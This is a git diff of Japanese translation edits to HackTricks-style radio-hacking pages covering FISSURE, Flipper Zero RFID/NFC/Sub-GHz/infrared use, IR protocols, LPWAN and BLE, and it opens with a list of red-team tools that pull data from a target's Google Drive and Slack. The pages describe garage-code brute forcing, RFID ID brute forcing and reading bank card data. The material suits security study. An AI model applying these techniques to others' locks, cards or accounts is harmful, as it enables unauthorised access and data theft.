 - [**GD-Thief**](https://github.com/antman1p/GD-Thief): 攻撃者がアクセスできるターゲットのGoogle Driveからファイルを抽出するためのRed Teamツールで、Google Drive APIを介して行います。これには、すべての共有ファイル、共有ドライブからのすべてのファイル、およびターゲットがアクセスできるドメインドライブからのすべてのファイルが含まれます。
 - [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): あなたがアクセスできるターゲット組織のGoogle People Directoryを抽出するためのRed Teamツールで、GoogleのPeople APIを介して行います。
 - [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** これは、アクセストークンを与えられたSlackワークスペースから「興味深い」情報を抽出するためにネイティブSlack APIを使用するPythonで開発されたツールです。
diff --git a/src/todo/radio-hacking/fissure-the-rf-framework.md b/src/todo/radio-hacking/fissure-the-rf-framework.md
index d78ffae78..6e794a3e7 100644
--- a/src/todo/radio-hacking/fissure-the-rf-framework.md
+++ b/src/todo/radio-hacking/fissure-the-rf-framework.md
@@ -2,11 +2,11 @@
 
 **周波数に依存しないSDRベースの信号理解とリバースエンジニアリング**
 
-FISSUREは、信号検出と分類、プロトコル発見、攻撃実行、IQ操作、脆弱性分析、自動化、AI/MLのためのフックを備えた、すべてのスキルレベル向けに設計されたオープンソースのRFおよびリバースエンジニアリングフレームワークです。このフレームワークは、ソフトウェアモジュール、ラジオ、プロトコル、信号データ、スクリプト、フローベース、参考資料、サードパーティツールの迅速な統合を促進するために構築されました。FISSUREは、ソフトウェアを1か所に保持し、特定のLinuxディストリビューションのための同じ実証済みのベースライン構成を共有しながら、チームがスムーズに作業を開始できるようにするワークフローの促進者です。
+FISSUREは、信号検出と分類、プロトコル発見、攻撃実行、IQ操作、脆弱性分析、自動化、AI/MLのためのフックを備えた、すべてのスキルレベル向けに設計されたオープンソースのRFおよびリバースエンジニアリングフレームワークです。このフレームワークは、ソフトウェアモジュール、ラジオ、プロトコル、信号データ、スクリプト、フローベースのグラフ、参考資料、サードパーティツールの迅速な統合を促進するために構築されました。FISSUREは、ソフトウェアを1か所に保持し、特定のLinuxディストリビューションのための同じ実証済みのベースライン構成を共有しながら、チームがスムーズに作業を開始できるようにするワークフローの促進者です。
 
-FISSUREに含まれるフレームワークとツールは、RFエネルギーの存在を検出し、信号の特性を理解し、サンプルを収集・分析し、送信および/または注入技術を開発し、カスタムペイロードやメッセージを作成するために設計されています。FISSUREには、識別、パケット作成、ファジングを支援するためのプロトコルおよび信号情報の成長するライブラリが含まれています。オンラインアーカイブ機能があり、信号ファイルをダウンロードし、トラフィックをシミュレートしてシステムをテストするためのプレイリストを構築できます。
+FISSUREに含まれるフレームワークとツールは、RFエネルギーの存在を検出し、信号の特性を理解し、サンプルを収集・分析し、送信および/または注入技術を開発し、カスタムペイロードやメッセージを作成するために設計されています。FISSUREには、識別、パケット作成、ファジングを支援するためのプロトコルおよび信号情報の成長するライブラリが含まれています。オンラインアーカイブ機能を使用して信号ファイルをダウンロードし、トラフィックをシミュレートしてシステムをテストするためのプレイリストを構築することができます。
 
-フレンドリーなPythonコードベースとユーザーインターフェースにより、初心者はRFおよびリバースエンジニアリングに関する人気のツールや技術を迅速に学ぶことができます。サイバーセキュリティやエンジニアリングの教育者は、組み込みの資料を活用したり、フレームワークを利用して自分の実世界のアプリケーションを示すことができます。開発者や研究者は、日常のタスクにFISSUREを使用したり、最先端のソリューションをより広いオーディエンスに公開するために利用できます。FISSUREの認知度と使用がコミュニティで高まるにつれて、その能力の範囲と包含する技術の幅も広がります。
+フレンドリーなPythonコードベースとユーザーインターフェースにより、初心者はRFおよびリバースエンジニアリングに関する人気のツールや技術を迅速に学ぶことができます。サイバーセキュリティやエンジニアリングの教育者は、組み込みの資料を活用したり、フレームワークを利用して自分の実世界のアプリケーションを示すことができます。開発者や研究者は、日常のタスクにFISSUREを使用したり、最先端のソリューションをより広いオーディエンスに公開することができます。FISSUREの認知度と使用がコミュニティで高まるにつれて、その能力の範囲と包含する技術の幅も広がります。
 
 **追加情報**
 
@@ -20,7 +20,7 @@ FISSUREに含まれるフレームワークとツールは、RFエネルギー
 
 **サポートされている**
 
-FISSURE内には、ファイルナビゲーションを容易にし、コードの冗長性を減らすために3つのブランチがあります。Python2\_maint-3.7ブランチは、Python2、PyQt4、およびGNU Radio 3.7を中心に構築されたコードベースを含み、Python3\_maint-3.8ブランチは、Python3、PyQt5、およびGNU Radio 3.8を中心に構築され、Python3\_maint-3.10ブランチは、Python3、PyQt5、およびGNU Radio 3.10を中心に構築されています。
+FISSURE内には、ファイルナビゲーションを容易にし、コードの冗長性を減らすために3つのブランチがあります。Python2\_maint-3.7ブランチは、Python2、PyQt4、およびGNU Radio 3.7を中心に構築されたコードベースを含み、Python3\_maint-3.8ブランチはPython3、PyQt5、およびGNU Radio 3.8を中心に構築され、Python3\_maint-3.10ブランチはPython3、PyQt5、およびGNU Radio 3.10を中心に構築されています。
 
 |   オペレーティングシステム   |   FISSUREブランチ   |
 | :--------------------------: | :----------------: |
@@ -36,9 +36,9 @@ FISSURE内には、ファイルナビゲーションを容易にし、コード
 これらのオペレーティングシステムはまだベータステータスです。開発中であり、いくつかの機能が欠けていることが知られています。インストーラー内の項目は、既存のプログラムと競合する可能性があるか、ステータスが削除されるまでインストールに失敗することがあります。
 
 |     オペレーティングシステム     |    FISSUREブランチ   |
-| :-------------------------------: | :-----------------: |
-| DragonOS Focal (x86\_64)        |  Python3\_maint-3.8 |
-|    Ubuntu 22.04 (x64)           | Python3\_maint-3.10 |
+| :------------------------------: | :-----------------: |
+| DragonOS Focal (x86\_64)       |  Python3\_maint-3.8 |
+|    Ubuntu 22.04 (x64)          | Python3\_maint-3.10 |
 
 注：特定のソフトウェアツールはすべてのOSで動作しません。[Software And Conflicts](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Help/Markdown/SoftwareAndConflicts.md)を参照してください。
 
@@ -50,7 +50,7 @@ git checkout <Python2_maint-3.7> or <Python3_maint-3.8> or <Python3_maint-3.10>
 git submodule update --init
 ./install
 ```
-これにより、インストールGUIを起動するために必要なPyQtソフトウェア依存関係が見つからない場合にインストールされます。
+これにより、インストールGUIを起動するために必要なPyQtソフトウェア依存関係がインストールされます。
 
 次に、オペレーティングシステムに最も適したオプションを選択します（OSがオプションに一致する場合は自動的に検出されるはずです）。
 
@@ -64,11 +64,11 @@ git submodule update --init
 
 **使用法**
 
-ターミナルを開いて、次のように入力します：
+ターミナルを開き、次のコマンドを入力します：
 ```
 fissure
 ```
-FISSUREの使用方法の詳細については、ヘルプメニューを参照してください。
+FISSUREのヘルプメニューを参照して、使用方法の詳細を確認してください。
 
 ## 詳細
 
@@ -129,7 +129,7 @@ FISSUREには、さまざまな技術や手法に慣れるためのいくつか
 
 ## 貢献
 
-FISSUREの改善に関する提案は大いに歓迎されます。以下の点について考えがある場合は、[Discussions](https://github.com/ainfosec/FISSURE/discussions)ページまたはDiscordサーバーにコメントを残してください：
+FISSUREの改善に関する提案は大いに歓迎されます。以下の件について考えがあれば、[ディスカッション](https://github.com/ainfosec/FISSURE/discussions)ページまたはDiscordサーバーにコメントを残してください：
 
 * 新機能の提案やデザイン変更
 * インストール手順を含むソフトウェアツール
@@ -139,7 +139,7 @@ FISSUREの改善に関する提案は大いに歓迎されます。以下の点
 * PythonでのIQ分析スクリプト
 * インストールの修正と改善
 
-FISSUREの改善に向けた貢献は、その開発を加速させるために重要です。あなたの貢献は大変感謝されます。コード開発を通じて貢献したい場合は、リポジトリをフォークしてプルリクエストを作成してください：
+FISSUREの改善に向けた貢献は、その開発を加速させるために重要です。あなたの貢献は大いに感謝されます。コード開発を通じて貢献したい場合は、リポジトリをフォークしてプルリクエストを作成してください：
 
 1. プロジェクトをフォーク
 2. フィーチャーブランチを作成 (`git checkout -b feature/AmazingFeature`)
@@ -147,11 +147,11 @@ FISSUREの改善に向けた貢献は、その開発を加速させるために
 4. ブランチにプッシュ (`git push origin feature/AmazingFeature`)
 5. プルリクエストを開く
 
-バグに注意を促すための[Issues](https://github.com/ainfosec/FISSURE/issues)の作成も歓迎されます。
+バグに注意を促すための[イシュー](https://github.com/ainfosec/FISSURE/issues)の作成も歓迎します。
 
 ## コラボレーション
 
-Assured Information Security, Inc. (AIS)のビジネス開発に連絡し、FISSUREのコラボレーション機会を提案し、正式化してください。ソフトウェアの統合に時間を割くこと、AISの才能ある人々があなたの技術的課題の解決策を開発すること、またはFISSUREを他のプラットフォーム/アプリケーションに統合することなどです。
+Assured Information Security, Inc. (AIS)のビジネス開発に連絡して、FISSUREのコラボレーション機会を提案し、正式化してください。ソフトウェアの統合に時間を割くこと、AISの才能ある人々があなたの技術的課題のためのソリューションを開発すること、またはFISSUREを他のプラットフォーム/アプリケーションに統合することなどです。
 
 ## ライセンス
 
@@ -177,4 +177,4 @@ Chris Poore - Assured Information Security, Inc. - poorec@ainfosec.com
 
 ## 謝辞
 
-このプロジェクトへの貢献に対して、Dr. Samuel MantravadiとJoseph Reithに特別な感謝を申し上げます。
+このプロジェクトへの貢献に対して、Dr. Samuel MantravadiとJoseph Reithに特別な感謝を捧げます。
diff --git a/src/todo/radio-hacking/flipper-zero/README.md b/src/todo/radio-hacking/flipper-zero/README.md
index fe7f4fbd4..a4f7e3326 100644
--- a/src/todo/radio-hacking/flipper-zero/README.md
+++ b/src/todo/radio-hacking/flipper-zero/README.md
@@ -4,11 +4,11 @@
 
 With [**Flipper Zero**](https://flipperzero.one/) you can:
 
-- **ラジオ周波数を聞く/キャプチャする/再生する:** [**Sub-GHz**](fz-sub-ghz.md)
-- **NFCカードを読み取る/キャプチャする/エミュレートする:** [**NFC**](fz-nfc.md)
-- **125kHzタグを読み取る/キャプチャする/エミュレートする:** [**125kHz RFID**](fz-125khz-rfid.md)
-- **赤外線信号を読み取る/キャプチャする/送信する:** [**Infrared**](fz-infrared.md)
-- **iButtonsを読み取る/キャプチャする/エミュレートする:** [**iButton**](../ibutton.md)
+- **ラジオ周波数を聞く/キャプチャ/再生する:** [**Sub-GHz**](fz-sub-ghz.md)
+- **NFCカードを読み取る/キャプチャ/エミュレートする:** [**NFC**](fz-nfc.md)
+- **125kHzタグを読み取る/キャプチャ/エミュレートする:** [**125kHz RFID**](fz-125khz-rfid.md)
+- **赤外線信号を読み取る/キャプチャ/送信する:** [**Infrared**](fz-infrared.md)
+- **iButtonsを読み取る/キャプチャ/エミュレートする:** [**iButton**](../ibutton.md)
 - **Bad USBとして使用する**
 - **セキュリティキー(U2F)として使用する**
 - **スネークをプレイする**
diff --git a/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md b/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
index 3d83d6e2b..0881bedec 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
@@ -27,11 +27,11 @@ Flipper Zeroで**手動でデータを指定して偽のカードを作成**し
 
 #### IDs on cards
 
-カードを取得すると、カードの一部にIDが書かれていることがあります。
+カードを取得すると、カードの一部にID（またはその一部）が表示されていることがあります。
 
 - **EM Marin**
 
-例えば、このEM-Marinカードでは、物理カードの最後の3バイトのうちの5バイトが**クリアで読み取れる**ことが可能です。\
+例えば、このEM-Marinカードでは、物理カードの**最後の3バイトのうちの5バイトがクリアに読み取れる**ことが可能です。\
 他の2バイトは、カードから読み取れない場合はブルートフォースで解読できます。
 
 <figure><img src="../../../images/image (104).png" alt=""><figcaption></figcaption></figure>
diff --git a/src/todo/radio-hacking/flipper-zero/fz-ibutton.md b/src/todo/radio-hacking/flipper-zero/fz-ibutton.md
index 8a667bceb..9722c85c9 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-ibutton.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-ibutton.md
@@ -12,7 +12,7 @@ iButtonについての詳細は以下を参照してください:
 
 ## Design
 
-以下の画像の**青**い部分は、Flipperが**読み取るために本物のiButtonを**置く必要がある場所です。**緑**の部分は、Flipper zeroで**iButtonを正しくエミュレートするためにリーダーに**触れる必要がある場所です。
+以下の画像の**青**い部分が、Flipperが**読み取るために本物のiButtonを置く必要がある**場所です。**緑**の部分は、Flipper zeroで**iButtonを正しくエミュレートするためにリーダーに触れる必要がある**場所です。
 
 <figure><img src="../../../images/image (565).png" alt=""><figcaption></figcaption></figure>
 
diff --git a/src/todo/radio-hacking/flipper-zero/fz-infrared.md b/src/todo/radio-hacking/flipper-zero/fz-infrared.md
index 4be90ded7..a27d3efce 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-infrared.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-infrared.md
@@ -14,7 +14,7 @@
 
 FlipperはデジタルIR信号受信機TSOPを使用しており、**IRリモコンからの信号を傍受することができます**。Xiaomiのような**スマートフォン**の中にはIRポートを持つものもありますが、**ほとんどは信号を送信することしかできず**、受信することはできません。
 
-Flipperの赤外線**受信機は非常に敏感です**。リモコンとテレビの間にいても**信号を受信することができます**。リモコンをFlipperのIRポートに直接向ける必要はありません。これは、誰かがテレビの近くでチャンネルを切り替えているときに便利で、あなたとFlipperが少し離れた場所にいる場合でも機能します。
+Flipperの赤外線**受信機は非常に敏感です**。リモコンとテレビの間にいる状態でも**信号をキャッチすることができます**。リモコンをFlipperのIRポートに直接向ける必要はありません。これは、誰かがテレビの近くでチャンネルを切り替えているときに便利で、あなたとFlipperがある程度離れていても機能します。
 
 **赤外線信号のデコード**は**ソフトウェア**側で行われるため、Flipper Zeroは**任意のIRリモコンコードの受信と送信をサポートする可能性があります**。認識できない**未知の**プロトコルの場合、Flipperは受信したままの生信号を**記録して再生**します。
 
@@ -24,14 +24,14 @@ Flipperの赤外線**受信機は非常に敏感です**。リモコンとテレ
 
 Flipper Zeroは、**任意のテレビ、エアコン、またはメディアセンターを制御するためのユニバーサルリモコン**として使用できます。このモードでは、Flipperは**SDカードの辞書に基づいて**すべてのサポートされているメーカーの**既知のコードを総当たり**します。レストランのテレビを消すために特定のリモコンを選ぶ必要はありません。
 
-ユニバーサルリモコンモードで電源ボタンを押すだけで、Flipperは知っているすべてのテレビの「電源オフ」コマンドを**順次送信します**：Sony、Samsung、Panasonic...など。テレビが信号を受信すると、反応してオフになります。
+ユニバーサルリモコンモードで電源ボタンを押すだけで、Flipperは**知っているすべてのテレビの「電源オフ」**コマンドを順次送信します：Sony、Samsung、Panasonic...など。テレビが信号を受信すると、反応してオフになります。
 
-このような総当たりには時間がかかります。辞書が大きいほど、完了するまでの時間が長くなります。テレビが正確にどの信号を認識したかを知ることはできません。テレビからのフィードバックがないためです。
+このような総当たりには時間がかかります。辞書が大きいほど、完了するまでの時間が長くなります。テレビが正確にどの信号を認識したかを知ることは不可能です。なぜなら、テレビからのフィードバックがないからです。
 
 ### 新しいリモコンを学習
 
-Flipper Zeroで**赤外線信号をキャプチャ**することが可能です。データベース内で信号を**見つけると**、Flipperは自動的に**このデバイスが何であるかを知り**、それと対話できるようになります。\
-見つからない場合、Flipperは**信号を保存**し、**再生する**ことを許可します。
+Flipper Zeroで**赤外線信号をキャッチする**ことが可能です。データベース内で信号を**見つけると**、Flipperは自動的に**このデバイスが何であるかを知り**、それと対話できるようになります。\
+もし見つからなければ、Flipperは**信号を保存**し、**再生する**ことを許可します。
 
 ## 参考文献
 
diff --git a/src/todo/radio-hacking/flipper-zero/fz-nfc.md b/src/todo/radio-hacking/flipper-zero/fz-nfc.md
index 9aaac21b2..391b864b4 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-nfc.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-nfc.md
@@ -17,7 +17,7 @@ RFIDとNFCに関する情報は、以下のページを確認してください
 
 新しいタイプのNFCカードがサポートカードのリストに追加されます。Flipper Zeroは以下の**NFCカードタイプA**（ISO 14443A）をサポートしています：
 
-- **銀行カード（EMV）** — UID、SAK、ATQAのみを読み取り、保存せずに表示します。
+- **銀行カード（EMV）** — UID、SAK、ATQAを読み取るだけで、保存はしません。
 - **不明なカード** — UID、SAK、ATQAを読み取り、UIDをエミュレートします。
 
 **NFCカードタイプB、タイプF、タイプV**については、Flipper ZeroはUIDを読み取ることができますが、保存はできません。
@@ -28,7 +28,7 @@ RFIDとNFCに関する情報は、以下のページを確認してください
 
 Flipper Zeroは銀行カードのUID、SAK、ATQA、保存されたデータを**保存せずに**読み取ることができます。
 
-銀行カード読み取り画面銀行カードについて、Flipper Zeroはデータを**保存せずにエミュレートすることなく**読み取ることができます。
+銀行カードの読み取り画面銀行カードについて、Flipper Zeroはデータを**保存せずに読み取ることしかできません**。
 
 <figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-26-31.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=916&#x26;w=2662" alt=""><figcaption></figcaption></figure>
 
@@ -36,13 +36,13 @@ Flipper Zeroは銀行カードのUID、SAK、ATQA、保存されたデータを*
 
 Flipper Zeroが**NFCカードのタイプを特定できない場合**、UID、SAK、ATQAのみを**読み取り、保存**できます。
 
-不明なカード読み取り画面不明なNFCカードについて、Flipper ZeroはUIDのみをエミュレートできます。
+不明なカードの読み取り画面不明なNFCカードについて、Flipper ZeroはUIDのみをエミュレートできます。
 
 <figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-27-53.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=932&#x26;w=2634" alt=""><figcaption></figcaption></figure>
 
 ### NFC cards types B, F, and V <a href="#wyg51" id="wyg51"></a>
 
-**NFCカードタイプB、F、V**について、Flipper ZeroはUIDを**読み取り、表示**することができますが、保存はできません。
+**NFCカードタイプB、F、V**について、Flipper ZeroはUIDを**読み取り、表示することしかできません**が、保存はできません。
 
 <figure><img src="https://archbee.imgix.net/3StCFqarJkJQZV-7N79yY/zBU55Fyj50TFO4U7S-OXH_screenshot-2022-08-12-at-182540.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=1080&#x26;w=2704" alt=""><figcaption></figcaption></figure>
 
@@ -52,7 +52,7 @@ NFCについてのイントロは[**このページを読んでください**](.
 
 ### Read
 
-Flipper Zeroは**NFCカードを読み取る**ことができますが、**ISO 14443に基づくすべてのプロトコルを理解しているわけではありません**。ただし、**UIDは低レベルの属性であるため**、**UIDがすでに読み取られているが、高レベルのデータ転送プロトコルがまだ不明な状況**に直面することがあります。Flipperを使用して、UIDを認証に使用する原始的なリーダーのためにUIDを読み取り、エミュレートし、手動で入力することができます。
+Flipper Zeroは**NFCカードを読み取ることができます**が、ISO 14443に基づくすべてのプロトコルを**理解しているわけではありません**。ただし、**UIDは低レベルの属性であるため**、**UIDがすでに読み取られているが、高レベルのデータ転送プロトコルがまだ不明な状況**に遭遇することがあります。Flipperを使用して、UIDを認証に使用する原始的なリーダーのためにUIDを読み取り、エミュレートし、手動で入力することができます。
 
 #### Reading the UID VS Reading the Data Inside <a href="#reading-the-uid-vs-reading-the-data-inside" id="reading-the-uid-vs-reading-the-data-inside"></a>
 
@@ -61,6 +61,19 @@ Flipper Zeroは**NFCカードを読み取る**ことができますが、**ISO 1
 Flipperでは、13.56 MHzタグの読み取りは2つの部分に分けられます：
 
 - **低レベルの読み取り** — UID、SAK、ATQAのみを読み取ります。Flipperは、カードから読み取ったこのデータに基づいて高レベルのプロトコルを推測しようとします。これは特定の要因に基づく仮定に過ぎないため、100%確実ではありません。
-- **高レベルの読み取り** — 特定の高レベルプロトコルを使用してカードのメモリからデータを読み取ります。これは、Mifare Ultralightのデータを読み取ること、Mifare Classicのセクターを読み取ること、またはPayPass/Apple Payからカードの属性を読み取ることになります。
+- **高レベルの読み取り** — 特定の高レベルプロトコルを使用してカードのメモリからデータを読み取ります。これは、Mifare Ultralightのデータを読み取ったり、Mifare Classicのセクターを読み取ったり、PayPass/Apple Payからカードの属性を読み取ったりすることです。
 
 ### Read Specific
+
+Flipper Zeroが低レベルデータからカードのタイプを見つけられない場合、`Extra Actions`で`Read Specific Card Type`を選択し、**手動で読み取りたいカードのタイプを指定**できます。
+
+#### EMV Bank Cards (PayPass, payWave, Apple Pay, Google Pay) <a href="#emv-bank-cards-paypass-paywave-apple-pay-google-pay" id="emv-bank-cards-paypass-paywave-apple-pay-google-pay"></a>
+
+UIDを単に読み取るだけでなく、銀行カードからはさらに多くのデータを抽出できます。**カード番号全体**（カードの前面にある16桁）、**有効期限**、場合によっては**所有者の名前**や**最近の取引のリスト**さえ取得できます。\
+ただし、**この方法でCVVを読み取ることはできません**（カードの裏面にある3桁）。また、**銀行カードはリプレイ攻撃から保護されているため**、Flipperでコピーしてからエミュレートして何かを支払うことはできません。
+
+## References
+
+- [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
index 8f9bf62c4..a4cd6825b 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
@@ -4,13 +4,13 @@
 
 ## Intro <a href="#kfpn7" id="kfpn7"></a>
 
-Flipper Zeroは**300-928 MHzの範囲でラジオ周波数を受信および送信**できる内蔵モジュールを備えており、リモコンを読み取り、保存し、エミュレートすることができます。これらのコントロールは、ゲート、バリア、ラジオロック、リモートコントロールスイッチ、ワイヤレスドアベル、スマートライトなどとの相互作用に使用されます。Flipper Zeroは、あなたのセキュリティが侵害されているかどうかを学ぶのに役立ちます。
+Flipper Zeroは**300-928 MHzの範囲の無線周波数を受信および送信**できる内蔵モジュールを備えており、リモコンを読み取り、保存し、エミュレートすることができます。これらのコントロールは、ゲート、バリア、無線ロック、リモートコントロールスイッチ、ワイヤレスドアベル、スマートライトなどとの相互作用に使用されます。Flipper Zeroは、あなたのセキュリティが侵害されているかどうかを学ぶのに役立ちます。
 
 <figure><img src="../../../images/image (714).png" alt=""><figcaption></figcaption></figure>
 
 ## Sub-GHz hardware <a href="#kfpn7" id="kfpn7"></a>
 
-Flipper Zeroは、[](https://www.st.com/en/nfc/st25r3916.html#overview)[CC1101チップ](https://www.ti.com/lit/ds/symlink/cc1101.pdf)に基づく内蔵のサブ1 GHzモジュールとラジオアンテナを備えており（最大範囲は50メートル）、CC1101チップとアンテナは、300-348 MHz、387-464 MHz、779-928 MHzの周波数帯域で動作するように設計されています。
+Flipper Zeroは、[](https://www.st.com/en/nfc/st25r3916.html#overview)[CC1101チップ](https://www.ti.com/lit/ds/symlink/cc1101.pdf)に基づく内蔵のサブ1 GHzモジュールと無線アンテナを備えており（最大範囲は50メートル）、CC1101チップとアンテナは、300-348 MHz、387-464 MHz、779-928 MHzの周波数帯域で動作するように設計されています。
 
 <figure><img src="../../../images/image (923).png" alt=""><figcaption></figcaption></figure>
 
@@ -23,7 +23,7 @@ Flipper Zeroは、[](https://www.st.com/en/nfc/st25r3916.html#overview)[CC
 
 分析中、Flipper Zeroは周波数設定で利用可能なすべての周波数で信号強度（RSSI）をスキャンしています。Flipper Zeroは、最も高いRSSI値を持つ周波数を表示し、信号強度が-90 [dBm](https://en.wikipedia.org/wiki/DBm)より高い場合に表示します。
 
-リモコンの周波数を特定するには、次の手順を実行します。
+リモコンの周波数を特定するには、次の手順を実行します：
 
 1. リモコンをFlipper Zeroの左側に非常に近く置きます。
 2. **メインメニュー** **→ Sub-GHz**に移動します。
@@ -37,12 +37,12 @@ Flipper Zeroは、[](https://www.st.com/en/nfc/st25r3916.html#overview)[CC
 
 **Read**オプションは、指定された変調で**設定された周波数をリスニング**します：デフォルトは433.92 AMです。読み取り中に**何かが見つかった場合**、**情報が画面に表示されます**。この情報は、将来信号を再現するために使用できます。
 
-Readを使用中は、**左ボタン**を押して**設定する**ことができます。\
+Readを使用している間、**左ボタン**を押して**設定する**ことができます。\
 この時点で**4つの変調**（AM270、AM650、FM328、FM476）と**いくつかの関連周波数**が保存されています：
 
 <figure><img src="../../../images/image (947).png" alt=""><figcaption></figcaption></figure>
 
-**興味のある周波数を設定する**ことができますが、リモコンが使用している可能性のある周波数が**不明な場合**は、**HoppingをONに設定**（デフォルトはOff）し、Flipperがそれをキャプチャして周波数を設定するために必要な情報を提供するまでボタンを何度も押してください。
+**興味のある周波数を設定する**ことができますが、リモコンが使用している周波数が**不明な場合**は、**HoppingをONに設定**（デフォルトはOFF）し、Flipperがそれをキャプチャして周波数を設定するために必要な情報を提供するまでボタンを何度も押してください。
 
 > [!CAUTION]
 > 周波数を切り替えるには時間がかかるため、切り替え時に送信された信号が失われる可能性があります。信号の受信を改善するために、Frequency Analyzerによって決定された固定周波数を設定してください。
@@ -58,7 +58,7 @@ Readを使用中は、**左ボタン**を押して**設定する**ことがで
 
 ### Brute-Force
 
-ガレージドアで使用されるプロトコルがわかっている場合、Flipper Zeroを使用して**すべてのコードを生成し、送信する**ことが可能です。これは一般的なガレージのタイプをサポートする例です：[**https://github.com/tobiabocchi/flipperzero-bruteforce**](https://github.com/tobiabocchi/flipperzero-bruteforce)
+ガレージドアで使用されるプロトコルを知っている場合、Flipper Zeroを使用して**すべてのコードを生成し、送信する**ことが可能です。これは一般的なガレージのタイプをサポートする例です：[**https://github.com/tobiabocchi/flipperzero-bruteforce**](https://github.com/tobiabocchi/flipperzero-bruteforce)
 
 ### Add Manually
 
diff --git a/src/todo/radio-hacking/infrared.md b/src/todo/radio-hacking/infrared.md
index 57266ca68..82442a694 100644
--- a/src/todo/radio-hacking/infrared.md
+++ b/src/todo/radio-hacking/infrared.md
@@ -6,7 +6,7 @@
 
 **赤外線は人間には見えません**。IRの波長は**0.7から1000ミクロン**です。家庭用リモコンはデータ伝送にIR信号を使用し、波長範囲は0.75..1.4ミクロンです。リモコン内のマイクロコントローラーは、特定の周波数で赤外線LEDを点滅させ、デジタル信号をIR信号に変換します。
 
-IR信号を受信するために**フォトレシーバー**が使用されます。これは**IR光を電圧パルスに変換**し、すでに**デジタル信号**です。通常、受信機内には**ダークライトフィルター**があり、**望ましい波長のみを通過させ**、ノイズをカットします。
+IR信号を受信するために**フォトレシーバー**が使用されます。これは**IR光を電圧パルスに変換**し、すでに**デジタル信号**です。通常、受信機内には**暗い光フィルター**があり、**望ましい波長のみを通過させ**、ノイズをカットします。
 
 ### IRプロトコルの多様性 <a href="#variety-of-ir-protocols" id="variety-of-ir-protocols"></a>
 
@@ -41,7 +41,7 @@ IRプロトコルは3つの要素で異なります：
 > [!NOTE]
 > いくつかのデバイスタイプに対して**普遍的になろうとしている**IRプロトコルがあります。最も有名なものはRC5とNECです。残念ながら、最も有名であることは**最も一般的であることを意味しません**。私の環境では、NECリモコンを2つしか見かけず、RC5のものはありませんでした。
 >
-> 製造業者は、同じデバイスの範囲内でも独自のユニークなIRプロトコルを使用するのが好きです（例えば、TVボックス）。したがって、異なる会社のリモコンや、同じ会社の異なるモデルのリモコンは、同じタイプの他のデバイスと連携できないことがあります。
+> 製造業者は、同じデバイスの範囲内でも独自のユニークなIRプロトコルを使用するのが好きです（例えば、テレビボックス）。したがって、異なる会社のリモコンや、同じ会社の異なるモデルのリモコンは、同じタイプの他のデバイスと連携できないことがあります。
 
 ### IR信号の探索
 
@@ -64,7 +64,7 @@ NECの**コマンド**は、プレアンブルに加えて、デバイスが何
 ### エアコン
 
 他のリモコンとは異なり、**エアコンは押されたボタンのコードだけを送信しません**。ボタンが押されると、**すべての情報を送信**して、**エアコンとリモコンが同期していることを確認します**。\
-これにより、20ºCに設定された機械が1つのリモコンで21ºCに上昇し、別のリモコンがまだ20ºCの温度で使用されると、さらに温度が上昇し、21ºCに「上昇」する（21ºCにいると思って22ºCにはならない）ことを避けることができます。
+これにより、20ºCに設定された機械が1つのリモコンで21ºCに上昇し、次に温度が20ºCのままの別のリモコンを使用してさらに温度を上げると、21ºCに「上昇」することを避けることができます（21ºCにいると思って22ºCにはならない）。
 
 ### 攻撃
 
diff --git a/src/todo/radio-hacking/low-power-wide-area-network.md b/src/todo/radio-hacking/low-power-wide-area-network.md
index c82045364..9bb6a965a 100644
--- a/src/todo/radio-hacking/low-power-wide-area-network.md
+++ b/src/todo/radio-hacking/low-power-wide-area-network.md
@@ -7,7 +7,7 @@
 **低電力広域ネットワーク** (LPWAN) は、**長距離通信**のために設計された無線の低電力広域ネットワーク技術のグループです。\
 これらは**6マイル**以上の距離に到達でき、**バッテリー**は最大で**20年**持続することができます。
 
-ロングレンジ (**LoRa**) は、複数の国で人気があり、**LoRaWAN**というオープンソースの仕様があります。
+ロングレンジ (**LoRa**) は複数の国で人気があり、**LoRaWAN**というオープンソースの仕様があります。
 
 ### LPWAN、LoRa、およびLoRaWAN
 
diff --git a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
index 1c64f8b83..89355233e 100644
--- a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
+++ b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -8,15 +8,15 @@ Bluetooth 4.0仕様から利用可能なBLEは、2400から2483.5 MHzの範囲
 
 BLEデバイスは、**広告パケット**（**ビーコンサ**）を送信することで通信します。これらのパケットは、BLEデバイスの存在を他の近くのデバイスにブロードキャストします。これらのビーコンは時々**データ**も**送信**します。
 
-リスニングデバイス、別名セントラルデバイスは、広告デバイスに特に送信された**SCANリクエスト**で広告パケットに応答できます。そのスキャンへの**応答**は、完全なデバイス名など、初期の広告リクエストに収まらなかった追加情報を含む**広告**パケットと同じ構造を使用します。
